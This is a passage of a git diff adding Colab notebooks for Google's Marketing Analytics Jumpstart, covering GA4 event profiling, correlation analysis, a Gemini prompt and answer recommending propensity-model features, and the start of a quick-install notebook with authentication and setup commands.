"ee5daed831c846579888db7cdb41f7e3", + "d0c43db386bb4448a24806a0714ccb17", + "928ef0f255144240a1b45fd3a194679b", + "f74ea56fe0d54fe796367e996d53dc07", + "31921cdef333470eb225aea88a7394dc", + "d8f2e9832b6e45baa7b93905f717b586", + "eb2bf24f7c0e40bda34c4ad6ae7f4846", + "5fb2b8eb975e4bcaa4b006ab4d2666ad", + "0d045ce66ac748f39b128dbb07d244ac", + "8c61a995c73042869b1c8ce078243b1f", + "f74ee834aea648e88643a05dd42f0335", + "6fe1fe4e25ad43f1bc8835e98cca60d2", + "542b7e2ead0f43019751a18d171b1da3", + "832c5afe0b1642dbae94c245f46d7616", + "5105210c3e6b4bda8c1c09a25036dc13", + "0f551e74aa334c1ebde5254c5041ed68", + "0fc48fa623064b1cbc1f929d3e2dab5e" + ] + }, + "id": "g7mGjbOFmGy9", + "outputId": "5e97fd21-a15a-4a72-cff0-ae56720755f7", + "cellView": "form" + }, + "execution_count": 6, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "\n ### Data extraction and transformation completed\n * Selected target event: *purchase*\n * Selected 8 feature events that will be used for analysis:\n ***view_cart***, ***select_promotion***, ***scroll***, ***click***, ***add_to_wishlist***, ***add_to_cart***, ***add_shipping_info***, 
***add_payment_info***\n " + }, + "metadata": {} + }, + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "\n ### You can proceed to the next step.\n " + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 4 - Generating a data profiling report with ydata_profiling\n", + "\n", + "# @markdown ##### 1. **Data Sampling**\n", + "# @markdown Use the slider to select the maximum number of\n", + "# @markdown rows to include in the report (max 50,000). A larger sample size\n", + "# @markdown may increase processing time. Suggested value: `10000`.\n", + "max_rows = 10000 # @param {\"type\":\"slider\",\"min\":100,\"max\":50000,\"step\":100}\n", + "\n", + "# @markdown ##### 2. **Report Filename**\n", + "# @markdown You can edit this if you want a different\n", + "# @markdown filename for your data profiling report.\n", + "# @markdown Suggested value: `profiling_report`.\n", + "filename = \"profiling_report\" #@param {type:\"string\"}\n", + "\n", + "# @markdown ##### 3. **Report Generation**\n", + "# @markdown Click the ( β–Ά ) button to create the report.\n", + "\n", + "# @markdown ##### 4. **Download**\n", + "# @markdown Once the report is ready, click the\n", + "# @markdown \"Download Report\" button that will appear to save it locally.\n", + "\n", + "# Renaming the first column to highlight the fact that it's the target\n", + "target_column = f\"Target: {bqdf.columns[0]}\"\n", + "\n", + "# Subsampling (if needed)\n", + "sample = bqdf.rename(columns={bqdf.columns[0]: target_column})\n", + "if len(bqdf) > max_rows:\n", + " print(f\"\"\"\n", + " We have {len(bqdf)} rows of data.\n", + " A random sub-sampling of {max_rows} will be performed.\"\"\")\n", + " sample = sample.sample(max_rows, random_state=42)\n", + "\n", + "# Generating the profiling report for the data\n", + "profile = ProfileReport(sample, title=\"Data Profiling Report\", minimal=False)\n", + "profile.to_file(f\"{filename}.html\")\n", + "\n", + "# Clearing the output\n", + "time.sleep(1)\n", + "clear_output(wait=True)\n", + "\n", + "# Message that will be displayed above the download button\n", + "output_prefix = \"\"\"### Data Profiling Report\n", + "\n", + "To download the data profiling report, click on the button below:\"\"\"\n", + "\n", + "# Message that will be displayed after the download button is clicked\n", + "output_suffix = \"### Report downloaded. You can proceed to the next step.\"\n", + "\n", + "# Read the HTML report in binary mode, encode it to base64, and decode to a\n", + "# UTF-8 string for use in the download link.\n", + "payload = base64.b64encode(open(f\"{filename}.html\", 'rb').read()).decode('utf-8')\n", + "\n", + "# To parse markdown in HTML we use a Javascript library (marked)\n", + "marked_js_src = \"https://cdn.jsdelivr.net/npm/marked/marked.min.js\"\n", + "\n", + "# HTML code\n", + "output_html = f\"\"\"\n", + "\n", + "\n", + " \n", + " \n", + "\n", + "\n", + "
\n", + " \n", + " \n", + " \n", + "
\n", + " \n", + "\n", + "\n", + "\"\"\"\n", + "\n", + "# Creating the widget containing the HTML output that will be displayed\n", + "output = widgets.HTML(output_html)\n", + "\n", + "# Displaying the HTML output\n", + "display(output)" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 183, + "referenced_widgets": [ + "e87812f5a898469bb2bad220a6e91566", + "5340a286a5c64ae18446fa1c7510715e", + "683df473a75d436e82b07a3169bfd64c", + "05d27b17d2c245ca832a0e9fb175c62b", + "3cd8c61bb49a43f3b0978837ef9a61bd", + "e617ffc8fe64453794e00ff383adfd49", + "58117e02cbbe4013899717d9149cadbc", + "ca7d018d03b349109625155ce8565556", + "997d2eb93bc947eb915dfc965c27387e", + "f151ebf67d20449a953acbde1cf6459f", + "5e667a61dcae4b8db4d9f1aeb3903161", + "a084bafb25c94e6997ba2f4da9db1819", + "23417e1e02b746599ab7cbed74052e14", + "49540d8b789341a0a0ae2749bf93de1d", + "355ee7238d914eeeaa1cdf62ef2ab176", + "8d32e8bfc0f6412fb2c78c3293010dbe", + "4a056b5aadf94bba97a5769dfacb551a", + "685e8e59c01f42388be05608248ed424", + "04aa8a778e1047a3b1ea78144f646f0c", + "1c2bbe06d9464626bfa1b5bc84db4ab3", + "f0a889f2b51f464cab9f3308e3b63121", + "a26e9a47d91348d3b105772edeac5630", + "ea7a3a04cfb94fe98bd95a9f7966edce", + "2a58793d049444c6a53aca19c71defb6", + "f6eb1f0d931747b481c36ddfbe2a5573", + "b81f9444bef847b88c08ac0680f8f658", + "5bfbecef183049f59f51d6e7da14e834", + "311de98c10b74ea2b1ed6eed85cdafda", + "ce5fbdac783f41689d7974ce121ac2cd", + "e51720ac245a45c1bd56134aef6a2a89", + "536ff1057f0e44d9985e76d3c320c7fd", + "9d9c41199f094121b70eb561b2243654", + "7b7b0397219a4ce98149f88c274ae6fa", + "2b9bd5bb500642288f0503b10f0814d6", + "482f143bc653446780d5306130c213ab", + "80e7a46044d94f31a151a2a9c2b9820f", + "475a36c2e5c44b40987b6352c400706c", + "19aed523b1514eb69cd9c1fe84f64469", + "aa913f5069c84d689fe80109f8fd39d7", + "85d79e9483714568a13d0215acc0d4c9", + "f3216918c66b46aaaa7af39dfb4185e9", + "51e51aa2d6cc4e7bbcfd3ea3e293fd1a", + "5a6a033f4a5b4827a3e58b0b5d4413b1", + "9090416b0b974821ad5fef43b11e5dc9", + "af6f4809165243a0954794c1a5aa27c5", + "e53e43bbf7664c52a8596aa2904aa028", + "5f5fd2294c99427c8705a42d25fecdd7" + ] + }, + "id": "yDG9-Litqr_9", + "outputId": "7a749a47-39c5-4cad-adc1-fbd603ce4cbc", + "cellView": "form" + }, + "execution_count": 7, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "HTML(value='\\n\\n\\n \\n 2: # Kruskal-Wallis for 3 or more groups\n", + " h_statistic, p_value = kruskal(*groups)\n", + " summary_markdown_str += f\"* Kruskal-Wallis H-statistic with {target_variable}: {h_statistic}\\n\"\n", + " summary_markdown_str += f\"* P-value: {p_value}\\n\"\n", + " else: # ANOVA for 2 groups\n", + " f_statistic, p_value = f_oneway(*groups)\n", + " summary_markdown_str += f\"* ANOVA F-statistic with {target_variable}: {f_statistic}\\n\"\n", + " summary_markdown_str += f\"* P-value: {p_value}\\n\"\n", + " else:\n", + " # Target is numerical: Use correlation\n", + " correlation = df[col].corr(df[target_variable])\n", + " summary_markdown_str += f\"* Correlation with {target_variable}: {correlation}\\n\"\n", + "\n", + " summary_markdown_str += \"\\n\" # Add an extra newline for better readability\n", + " return summary_markdown_str\n", + "\n", + "# --- Main execution block ---\n", + "\n", + "# Initialize the output string with a heading\n", + "analysis_output = f\"## Exploratory Data Analysis – {target_column}\"\n", + "\n", + "\n", + "no_type_error = True\n", + "\n", + "# Loop through each column in the DataFrame\n", + "for count, col in 
enumerate(sample.columns, start=1):\n", + "\n", + "# Analyze the relationship between the current column and the target variable\n", + " try:\n", + " print(f\"Analyzing column {count}/{len(sample.columns)} - {col}\", end=\"\")\n", + " analysis_output += analyze_relationship(sample, target_column, col)\n", + " print(f\" – Done.\")\n", + " except TypeError:\n", + " print(f\" – Skipped due to TypeError.\")\n", + " no_type_error = False\n", + "\n", + "# Add correlation and covariance matrices to the output\n", + "analysis_output += \"\\n ## Correlation Matrix\\n\\n\"\n", + "analysis_output += sample.corr(numeric_only=True).to_markdown()\n", + "analysis_output += \"\\n \\n ## Covariance Matrix\\n\\n\"\n", + "analysis_output += sample.cov(numeric_only=True).to_markdown()\n", + "\n", + "# If there were errors when analyzing, we leave the issues displayed\n", + "if no_type_error:\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + "output = \"\"\"\n", + "### Exploratory data analysis completed. You can proceed to the next step.\n", + "\n", + "If you want to display the results, click on the button below:\n", + "\"\"\"\n", + "\n", + "display_analysis_button = widgets.Button(description=\"Display Analysis\")\n", + "\n", + "def display_analysis(button):\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + " display(Markdown(analysis_output))\n", + " output = \"\"\"\n", + " ### Analysis displayed. You can proceed to the next step.\n", + " \"\"\"\n", + " display(Markdown(output))\n", + "\n", + "display_analysis_button.on_click(display_analysis)\n", + "\n", + "display(Markdown(output), display_analysis_button)" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 1000, + "referenced_widgets": [ + "8984f440582d47f3906577d85cea75be", + "eeff31568fbf45128403f36d4bc4ef52", + "798f3dabcdbc4b5d8a158865c4d57ec6" + ] + }, + "id": "j4eKkLPaLKGq", + "outputId": "ade6fda0-54a8-4227-9e92-34b490f3de85", + "cellView": "form" + }, + "execution_count": 8, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "## Exploratory Data Analysis – Target: purchase_past_7_days\n### Target: purchase_past_7_days (Numerical) - This is the target variable\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0155\n* Standard Deviation: 0.34824111932354973\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 27.0\n* Correlation with Target: purchase_past_7_days: 1.0\n\n\n### view_cart_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0689\n* Standard Deviation: 0.5792981517619951\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 30.0\n* Correlation with Target: purchase_past_7_days: 0.62827199072288\n\n\n### select_promotion_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.2078\n* Standard Deviation: 0.7563573015690163\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 16.0\n* Correlation with Target: purchase_past_7_days: 0.03447300777908604\n\n\n### scroll_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.6606\n* Standard Deviation: 3.578280040578837\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 1.0\n* Maximum: 341.0\n* Correlation with Target: purchase_past_7_days: 0.13777167380447158\n\n\n### click_past_7_days (Numerical)\n* Type: Float64\n* Count: 
10000.0\n* Mean: 0.0119\n* Standard Deviation: 0.1239351685059542\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 5.0\n* Correlation with Target: purchase_past_7_days: -0.001956899281874871\n\n\n### add_to_wishlist_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0107\n* Standard Deviation: 0.29050636721927364\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 19.0\n* Correlation with Target: purchase_past_7_days: 0.07448039795890475\n\n\n### add_to_cart_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.1416\n* Standard Deviation: 1.2781677555317719\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 86.0\n* Correlation with Target: purchase_past_7_days: 0.541054963037204\n\n\n### add_shipping_info_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0437\n* Standard Deviation: 0.5950005987990745\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 40.0\n* Correlation with Target: purchase_past_7_days: 0.9142771941406722\n\n\n### add_payment_info_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0472\n* Standard Deviation: 0.8092203925781755\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 57.0\n* Correlation with Target: purchase_past_7_days: 0.9552578954763322\n\n\n ## Correlation Matrix\n\n| | Target: purchase_past_7_days | view_cart_past_7_days | select_promotion_past_7_days | scroll_past_7_days | click_past_7_days | add_to_wishlist_past_7_days | add_to_cart_past_7_days | add_shipping_info_past_7_days | add_payment_info_past_7_days |\n|:------------------------------|-------------------------------:|------------------------:|-------------------------------:|---------------------:|--------------------:|------------------------------:|--------------------------:|--------------------------------:|-------------------------------:|\n| Target: purchase_past_7_days | 1 | 0.628272 | 0.034473 | 0.137772 | -0.0019569 | 0.0744804 | 0.541055 | 0.914277 | 0.955258 |\n| view_cart_past_7_days | 0.628272 | 1 | 0.149922 | 0.167022 | 0.0373333 | 0.100211 | 0.708627 | 0.800785 | 0.737409 |\n| select_promotion_past_7_days | 0.034473 | 0.149922 | 1 | 0.0860721 | -0.0135797 | 0.0704425 | 0.148321 | 0.0784891 | 0.0571763 |\n| scroll_past_7_days | 0.137772 | 0.167022 | 0.0860721 | 1 | 0.0118144 | 0.0433242 | 0.142168 | 0.15498 | 0.150974 |\n| click_past_7_days | -0.0019569 | 0.0373333 | -0.0135797 | 0.0118144 | 1 | -0.00353691 | 0.00703915 | 0.00379702 | 0.00237653 |\n| add_to_wishlist_past_7_days | 0.0744804 | 0.100211 | 0.0704425 | 0.0433242 | -0.00353691 | 1 | 0.142979 | 0.0765613 | 0.0735767 |\n| add_to_cart_past_7_days | 0.541055 | 0.708627 | 0.148321 | 0.142168 | 0.00703915 | 0.142979 | 1 | 0.58981 | 0.564985 |\n| add_shipping_info_past_7_days | 0.914277 | 0.800785 | 0.0784891 | 0.15498 | 0.00379702 | 0.0765613 | 0.58981 | 1 | 0.971957 |\n| add_payment_info_past_7_days | 0.955258 | 0.737409 | 0.0571763 | 0.150974 | 0.00237653 | 0.0735767 | 0.564985 | 0.971957 | 1 |\n \n ## Covariance Matrix\n\n| | Target: purchase_past_7_days | view_cart_past_7_days | select_promotion_past_7_days | scroll_past_7_days | click_past_7_days | add_to_wishlist_past_7_days | add_to_cart_past_7_days | add_shipping_info_past_7_days | add_payment_info_past_7_days 
|\n|:------------------------------|-------------------------------:|------------------------:|-------------------------------:|---------------------:|--------------------:|------------------------------:|--------------------------:|--------------------------------:|-------------------------------:|\n| Target: purchase_past_7_days | 0.121272 | 0.126745 | 0.00908001 | 0.171678 | -8.44584e-05 | 0.0075349 | 0.240829 | 0.189442 | 0.269195 |\n| view_cart_past_7_days | 0.126745 | 0.335586 | 0.0656891 | 0.346219 | 0.00268036 | 0.0168645 | 0.524696 | 0.276017 | 0.345682 |\n| select_promotion_past_7_days | 0.00908001 | 0.0656891 | 0.572076 | 0.232951 | -0.00127295 | 0.0154781 | 0.14339 | 0.0353227 | 0.0349953 |\n| scroll_past_7_days | 0.171678 | 0.346219 | 0.232951 | 12.8041 | 0.00523938 | 0.0450361 | 0.650224 | 0.329965 | 0.437163 |\n| click_past_7_days | -8.44584e-05 | 0.00268036 | -0.00127295 | 0.00523938 | 0.0153599 | -0.000127343 | 0.00111507 | 0.000279998 | 0.000238344 |\n| add_to_wishlist_past_7_days | 0.0075349 | 0.0168645 | 0.0154781 | 0.0450361 | -0.000127343 | 0.0843939 | 0.0530902 | 0.0132337 | 0.0172967 |\n| add_to_cart_past_7_days | 0.240829 | 0.524696 | 0.14339 | 0.650224 | 0.00111507 | 0.0530902 | 1.63371 | 0.448557 | 0.584375 |\n| add_shipping_info_past_7_days | 0.189442 | 0.276017 | 0.0353227 | 0.329965 | 0.000279998 | 0.0132337 | 0.448557 | 0.354026 | 0.467984 |\n| add_payment_info_past_7_days | 0.269195 | 0.345682 | 0.0349953 | 0.437163 | 0.000238344 | 0.0172967 | 0.584375 | 0.467984 | 0.654838 |" + }, + "metadata": {} + }, + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "\n ### Analysis displayed. You can proceed to the next step.\n " + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 6 - Getting recommendations from Gemini\n", + "\n", + "# @markdown Click the ( β–Ά ) button to generate a feature selection\n", + "# @markdown recommendation with Gemini, based on the exploratory data\n", + "# @markdown analysis performed at Step 5.\n", + "\n", + "# @markdown Gemini should also generate and highlight a short list of features\n", + "# @markdown that you can copy-paste in the `terraform.tfvars` file when\n", + "# @markdown installing the Marketing Analytics Jumpstart following the\n", + "# @markdown [installation guide](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/infrastructure/terraform/README.md#manual-installation-of-terraform-modules).\n", + "\n", + "\n", + "# @markdown ---\n", + "# @markdown #### Gemini Parameters\n", + "# @markdown The sliders below allow to customize the parameters used with the\n", + "# @markdown LLM model to generate the response:\n", + "\n", + "# @markdown 1. **Temperature** controls the randomness in token\n", + "# @markdown selection. A lower temperature is good when you expect a true or\n", + "# @markdown correct response. A temperature of 0 means the highest probability\n", + "# @markdown token is usually selected.\n", + "# @markdown A higher temperature can lead to diverse or unexpected results.\n", + "# @markdown Suggested value: `0.9`.\n", + "temperature = 0.9 # @param {\"type\":\"slider\",\"min\":0,\"max\":2,\"step\":0.1}\n", + "\n", + "# @markdown 2. **Top-P** changes how the model selects tokens for output.\n", + "# @markdown Tokens are selected from most probable to least until the sum of\n", + "# @markdown their probabilities equals the top-p value. 
For example, if tokens\n", + "# @markdown A, B, and C have a probability of .3, .2, and .1 and the top-p\n", + "# @markdown value is .5, then the model will select either A or B as the next\n", + "# @markdown token (using temperature). For the least variable results, set top-P\n", + "# @markdown to 0.\n", + "# @markdown Suggested value: `0.95`.\n", + "top_p = 0.95 # @param {\"type\":\"slider\",\"min\":0,\"max\":1,\"step\":0.01}\n", + "\n", + "# @markdown 3. **Top-K** specifies the number of candidate tokens when the model\n", + "# @markdown is selecting an output token. Use a lower value for less random\n", + "# @markdown responses and a higher value for more random responses. Suggested\n", + "# @markdown value: `1`.\n", + "top_k = 1 # @param {\"type\":\"slider\",\"min\":1,\"max\":40,\"step\":1}\n", + "\n", + "# @markdown 4. **Max Output Tokens** determines the maximum amount of text output\n", + "# @markdown from one prompt. A token is approximately four characters.\n", + "# @markdown Suggested value: `8192`.\n", + "max_output_tokens = 8192 # @param {\"type\":\"slider\",\"min\":1,\"max\":8192,\"step\":1}\n", + "\n", + "# @markdown ---\n", + "\n", + "# Prepare the prompt for Gemini\n", + "prompt = f\"\"\"\n", + "You are an expert data scientist and AI assistant helping to build a propensity model.\n", + "\n", + "The data comes from an export of GA4 data to BigQuery and we want to select the best events to use to create features to be used in the propensity model.\n", + "\n", + "Here is the output of the feature analysis. We calculated the correlation coefficient between each feature and the target {target}:\n", + "\n", + "{analysis_output}\n", + "\n", + "The features and target were engineered by counting the number of times each event occurred within a {rolling_window}-day rolling window and over a date range of {date_range_length} days. Both these parameters can be adjusted and the exploratory data analysis can be performed again.\n", + "If you think the data we have in the output of the feature analysis is not sufficient to make a recommendation, suggest to re-run the analysis proposing new values for number of days for the rolling windows and the date range.\n", + "\n", + "The event names can be deduced from the feature by removing the '_past_{rolling_window}_days' suffix.\n", + "\n", + "Based on this analysis, which events would you suggest to select for the propensity model?\n", + "\n", + "Start your answer with a title and divide it in sections using markdown.\n", + "\n", + "Provide your suggestions in a clear and concise format, explaining your reasoning. You can organize the selected events in a way that you think is most helpful. 
For example, you might group them by event type or by importance.\n", + "\n", + "List the suggested events to be used for features and the event to be used as target in the following format:\n", + "\n", + "* Target Event: `target_event`\n", + "* Analyzed Events: `event_1`, `event_2`, ..., `event_n`\n", + "* Suggested Events: `event_3`, `event_7`, `event_4`, `event_2`\n", + "\n", + "At the end, explicitly provide the following message to help the user copy-paste the suggested events including the list of suggested events:\n", + "\n", + "\n", + "### Copy the list below and paste into the `terraform.tfvars` file when installing the Marketing Analytics Jumpstart:\n", + "\n", + "```\n", + "[\"event_3\", \"event_7\", \"event_4\" , \"event_2\"]\n", + "```\n", + "\"\"\"\n", + "\n", + "model=GenerativeModel(\"gemini-1.5-pro\")\n", + "generation_config=GenerationConfig(\n", + " temperature=temperature,\n", + " top_p=top_p,\n", + " top_k=top_k,\n", + " max_output_tokens=max_output_tokens\n", + ")\n", + "\n", + "response = model.generate_content(prompt, generation_config=generation_config)\n", + "display(Markdown(response.text))" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 708 + }, + "id": "g1vVmun1mpag", + "outputId": "58be510a-8c4c-43e9-ac56-81dd25676550", + "cellView": "form" + }, + "execution_count": 10, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "## Propensity Model Event Selection:\n\nThis analysis aims to recommend events from your GA4 data in BigQuery for building a propensity model to predict **purchase** likelihood. \n\n### Understanding the Results:\n\n* **Target Variable:** `purchase_past_7_days` signifies whether a user made a purchase in the past 7 days. Values range from 0 to 27, indicating multiple purchases are possible.\n* **Features:** Each other variable represents a user action (event) aggregated over a 7-day window. \n* **Correlation:** Measures the linear relationship between an event and the target. Values closer to 1 or -1 indicate stronger relationships.\n\n### Event Selection Rationale:\n\nWe'll prioritize events with the strongest positive correlation to `purchase_past_7_days`, as they are the most indicative of purchase intent. However, highly correlated features might carry redundant information, so we'll aim for a balance of predictability and model simplicity.\n\n1. **High Correlation Events:** \n * `add_payment_info`: **Strongest correlation (0.955)**, logically connected to purchase completion.\n * `add_shipping_info`: **Very high correlation (0.914),** another strong indicator of purchase intent.\n * **Note:** The extremely high correlation between these two might indicate they capture very similar user behavior. Consider whether one sufficiently represents the step before purchase or if both are necessary. \n\n2. **Moderate Correlation Events:**\n * `view_cart`: **Good correlation (0.628).** Viewing a cart suggests product consideration.\n * `add_to_cart`: **Solid correlation (0.541).** Adding to cart is a stronger purchase intent signal than just viewing.\n\n3. **Events for Potential Further Analysis (with adjustments):**\n * `scroll`: While the correlation is low (0.138), engagement metrics like scroll depth *might* become more predictive if we modify the aggregation window (e.g., 1-day instead of 7-day) or segment users differently. \n\n4. 
**Events to Exclude:**\n * `select_promotion`, `click`, `add_to_wishlist` show very weak or slightly negative correlations. They're unlikely to improve model accuracy.\n\n### Suggested Events:\n\n* **Target Event:** `purchase` \n* **Analyzed Events:** `view_cart`, `select_promotion`, `scroll`, `click`, `add_to_wishlist`, `add_to_cart`, `add_shipping_info`, `add_payment_info`\n* **Suggested Events:** `add_payment_info`, `add_shipping_info`, `add_to_cart`, `view_cart`\n\n### Copy the list below and paste into the `terraform.tfvars` file when installing the Marketing Analytics Jumpstart:\n\n```\n[\"add_payment_info\", \"add_shipping_info\", \"add_to_cart\" , \"view_cart\"]\n``` \n" + }, + "metadata": {} + } + ] + } + ] +} \ No newline at end of file diff --git a/notebooks/quick_installation.ipynb b/notebooks/quick_installation.ipynb new file mode 100644 index 00000000..56f14d1b --- /dev/null +++ b/notebooks/quick_installation.ipynb @@ -0,0 +1,563 @@ +{ + "nbformat": 4, + "nbformat_minor": 0, + "metadata": { + "colab": { + "provenance": [] + }, + "kernelspec": { + "name": "python3", + "display_name": "Python 3" + }, + "language_info": { + "name": "python" + } + }, + "cells": [ + { + "cell_type": "markdown", + "source": [ + "# Marketing Analytics Jumpstart Quick Installation\n", + "\n", + "\n", + "\n", + " \n", + " \n", + " \n", + " \n", + "
\n", + " \n", + " \"Google
Run in Colab\n", + "
\n", + "
\n", + " \n", + " \"Google
Run in Colab Enterprise\n", + "
\n", + "
\n", + " \n", + " \"GitHub
View on GitHub\n", + "
\n", + "
\n", + " \n", + " \"Vertex
Open in Vertex AI Workbench\n", + "
\n", + "
" + ], + "metadata": { + "id": "AKtB_GVpt2QJ" + } + }, + { + "cell_type": "markdown", + "source": [ + "Follow this Colab notebook to quick install the Marketing Analytics Jumpstart solution on a Google Cloud Project.\n", + "\n", + "> **Note:** You need access to the Google Analytics 4 Property, Google Ads Account and a Google Cloud project in which you will deploy Marketing Analytics Jumpstart, with the following permissions:\n", + ">> * Google Analytics Property Editor or Owner\n", + ">>\n", + ">> * Google Ads Reader\n", + ">>\n", + ">> * Project Owner for a Google Cloud Project\n", + ">>\n", + ">> * GitHub or GitLab account priviledges for repo creation and access token. [Details](https://cloud.google.com/dataform/docs/connect-repository)\n", + "\n", + "\n", + "\n", + "Total Installation time is around **35-40 minutes**." + ], + "metadata": { + "id": "mj-8n9jIyTn-" + } + }, + { + "cell_type": "markdown", + "source": [ + "### 1. Authenticate to Google Cloud Platform\n", + "\n", + "Click the ( β–Ά ) button to authenticate you to the Google Cloud Project.\n", + "\n", + "***Time: 30 seconds.***" + ], + "metadata": { + "id": "DDGHqJNhq5Oi" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "from google.colab import auth\n", + "auth.authenticate_user()\n", + "\n", + "print('Authenticated')" + ], + "metadata": { + "id": "9TyPgnleJGGZ", + "cellView": "form", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "921e7c52-1913-402b-a880-8760861d0358" + }, + "execution_count": 1, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "Authenticated\n" + ] + } + ] + }, + { + "cell_type": "markdown", + "source": [ + "### 2. Installation Configurations\n", + "\n", + "Fill-out the form, and Click the ( β–Ά ) button.\n", + "\n", + "***Time: 10 minutes.***" + ], + "metadata": { + "id": "mq1yqwr8qcx1" + } + }, + { + "cell_type": "code", + "source": [ + "# @markdown ---\n", + "# @markdown # Google Cloud Platform\n", + "# @markdown Copy the `Project ID` from the \"Project Info\" card in the console [Dashboard](https://console.cloud.google.com/home/dashboard).\n", + "GOOGLE_CLOUD_PROJECT_ID = \"your-project-id\" #@param {type:\"string\"}\n", + "GOOGLE_CLOUD_QUOTA_PROJECT = GOOGLE_CLOUD_PROJECT_ID\n", + "PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "MAJ_DEFAULT_PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "# @markdown ---\n", + "# @markdown # Google Analytics 4\n", + "# @markdown For a quick installation, copy the Google Analytics 4 property ID and stream ID. You will find it in your Google Analytics 4 console, under Admin settings.\n", + "GA4_PROPERTY_ID = \"1234567890\" #@param {type:\"string\"}\n", + "MAJ_GA4_PROPERTY_ID = GA4_PROPERTY_ID\n", + "GA4_STREAM_ID = \"1234567890\" #@param {type:\"string\"}\n", + "MAJ_GA4_STREAM_ID = GA4_STREAM_ID\n", + "# @markdown The website your Google Analytics 4 events are coming from.\n", + "WEBSITE_URL = \"https://shop.googlemerchandisestore.com\" #@param {type:\"string\", placeholder:\"Full web URL\"}\n", + "MAJ_WEBSITE_URL = WEBSITE_URL\n", + "# @markdown ---\n", + "# @markdown # Google Ads\n", + "# @markdown For a quick installation, copy the Google Ads Customer ID. You will find it in your Google Ads console. It must be in the following format: `\"CUSTOMERID\"` (without dashes).\n", + "GOOGLE_ADS_CUSTOMER_ID= \"1234567890\" #@param {type:\"string\", placeholder:\"GAds Account Number (e.g. 
4717384083)\"}\n", + "MAJ_ADS_EXPORT_TABLE_SUFFIX = \"_\"+GOOGLE_ADS_CUSTOMER_ID\n", + "# @markdown ---\n", + "# @markdown # Github\n", + "# @markdown For a quick installation, use your email credentials that allows you to create a dataform repository connected to a remote Github repository, more info [here](https://cloud.google.com/dataform/docs/connect-repository).\n", + "GITHUB_REPO_OWNER_EMAIL = \"user@company.com\" #@param {type:\"string\", placeholder:\"user@company.com\"}\n", + "MAJ_DATAFORM_REPO_OWNER_EMAIL = GITHUB_REPO_OWNER_EMAIL\n", + "MAJ_DATAFORM_GITHUB_REPO_URL = \"https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart-dataform.git\"\n", + "# @markdown For a quick installation, reuse or create your [GitHub personal access token](https://cloud.google.com/dataform/docs/connect-repository#connect-https)\n", + "GITHUB_PERSONAL_TOKEN = \"your_github_personal_access_token\" #@param {type:\"string\"}\n", + "MAJ_DATAFORM_GITHUB_TOKEN = GITHUB_PERSONAL_TOKEN\n", + "# @markdown ---\n", + "\n", + "import os\n", + "os.environ['GOOGLE_CLOUD_PROJECT_ID'] = GOOGLE_CLOUD_PROJECT_ID\n", + "os.environ['GOOGLE_CLOUD_QUOTA_PROJECT'] = GOOGLE_CLOUD_QUOTA_PROJECT\n", + "os.environ['PROJECT_ID'] = PROJECT_ID\n", + "os.environ['MAJ_DEFAULT_PROJECT_ID'] = MAJ_DEFAULT_PROJECT_ID\n", + "!export SOURCE_ROOT=$(pwd)\n", + "!export TERRAFORM_RUN_DIR={SOURCE_ROOT}/infrastructure/terraform\n", + "REPO=\"marketing-analytics-jumpstart\"\n", + "!if [ ! -d \"/content/{REPO}\" ]; then git clone https://github.com/GoogleCloudPlatform/{REPO}.git ; fi\n", + "SOURCE_ROOT=\"/content/\"+REPO\n", + "%cd {SOURCE_ROOT}\n", + "!echo \"Enabling APIs\"\n", + "!gcloud config set project {GOOGLE_CLOUD_PROJECT_ID}\n", + "!. 